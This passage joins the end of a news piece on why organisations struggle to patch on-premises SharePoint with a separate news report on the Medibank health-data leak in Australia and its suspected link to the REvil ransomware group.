Beaumont told Rest of World that the problem is that organizations that use SharePoint have not patched it yet, in part because the patching process is not straightforward. “SharePoint patching is also notoriously complicated — it would be quicker to watch the extended versions of The Hobbit trilogy and The Lord of the Rings trilogy back to back than try to update the average large SharePoint farm,” Beaumont said in a chat.

That’s what makes SharePoint such an appealing target — and so difficult to patch: with so many companies and governments relying on the software as an internal network, it is often configured to run alongside other essential systems, making it complex and time-consuming to update. Nobody wants their laptop to stay in blue screen while waiting for an update — let alone the server network for an entire municipality or billion-dollar corporation.

Another complication, said Beaumont, is that Microsoft has since launched a cloud version of SharePoint, called SharePoint Online, which makes patching much easier — but not all users have migrated to the cloud. “If SharePoint Online didn’t exist, all customers would be screaming about patching by now, in my opinion. Instead, that research and development has gone to cloud,” Beaumont said. 

Companies that rely on sales tend to focus on developing new products rather than fixes for systems they’ve already sold, according to Childs at Zero Day Initiative, which means developing patches is rarely at the top of the list. “The state of patching really has not progressed much in the last 15 years,” said Childs, adding that as many as 20% of vulnerabilities his organization pays researchers for are from failed patches. “It’s kind of astonishing.”

Hackers leak Australian health records on dark web

Hackers have followed through on a threat to leak sensitive medical records stolen from a major Australian health company that counts the country’s prime minister among nearly 10 million customers.

Medibank told investors that a “sample” selection of customer data was posted on a “dark web forum” on Wednesday after it refused to pay a ransom demand.

The data included names, birth dates, passport numbers and information on medical claims for hundreds of customers who were separated into “naughty” and “nice” lists.

Some on the “naughty” list had numeric codes that appeared to link them to drug addiction, alcohol abuse and HIV infection.

For example, one record carried an entry that read: “p_diag: F122”.

F122 corresponds with “cannabis dependence” under the International Classification of Diseases, published by the World Health Organization.

Medibank is Australia’s largest private health insurer and the hack is likely to include some of the country’s most influential and wealthy individuals.

Prime Minister Anthony Albanese said he himself was a Medibank customer and that the attack was a “wake-up call” for corporate Australia.

Potential Russian link

The perpetrator of the hack has not yet been publicly identified.

But the Australian Federal Police’s Justine Gough said it was the work of a “criminal or criminal groups” that could be operating outside the country.

Sanjay Jha, chief scientist at the University of New South Wales’s Institute for Cyber Security, said it was difficult to attribute any attack to a single group.

However, he told AFP it carried some of the hallmarks associated with a Russian hacker group called REvil—which has previously targeted everything from Brazilian meat company JBS to Lady Gaga.

“The pattern matches the behaviour in parts. So that is why there is a serious indication it could be them selling the data,” Jha said.

A defunct REvil website has been redirecting traffic to the dark web forum where the Medibank data was leaked.

REvil—an amalgam of ransomware and evil—was the subject of a US$10 million reward from US authorities before being reportedly dismantled by Russia this year.

JBS Foods, one of the largest beef producers in the world, paid REvil a ransom of US$11 million in 2021.

Jha said the hackers could now look to sell the sensitive data to blackmailers and other scammers.

‘Scumbags’ and ‘crooks’

The hackers also uploaded what they said were a series of messages sent to Medibank in the days before the leak.

“We will do everything in our power to inflict as much damage as possible for you, both financial and reputational,” one message from the hackers read.

Hundreds of millions of US dollars have been wiped off Medibank’s market value, with the company’s share price down more than 20 percent since October, when news of the leak first emerged.

Troy Hunt, a cyber security expert working for Microsoft, wrote on Twitter that the breach was “about as bad as we feared it would get”.

The Medibank hack followed an attack on telecom company Optus in September that exposed the personal information of some nine million Australians.

Jha said the enormous Medibank and Optus data breaches could make it easier to carry out cyber attacks on different systems in the future.

“A lot of credentials have been stolen in recent months,” he said. “That makes the job of attackers easier—they can go and try other systems with millions of credentials.”

Australia’s assistant treasurer Stephen Jones said the perpetrators were “scumbags” and “crooks”.

“We shouldn’t be giving in to these fraudsters,” he told local media.

As Medibank tried to contain the leak, it was also staring down the barrel of a potentially costly class action lawsuit.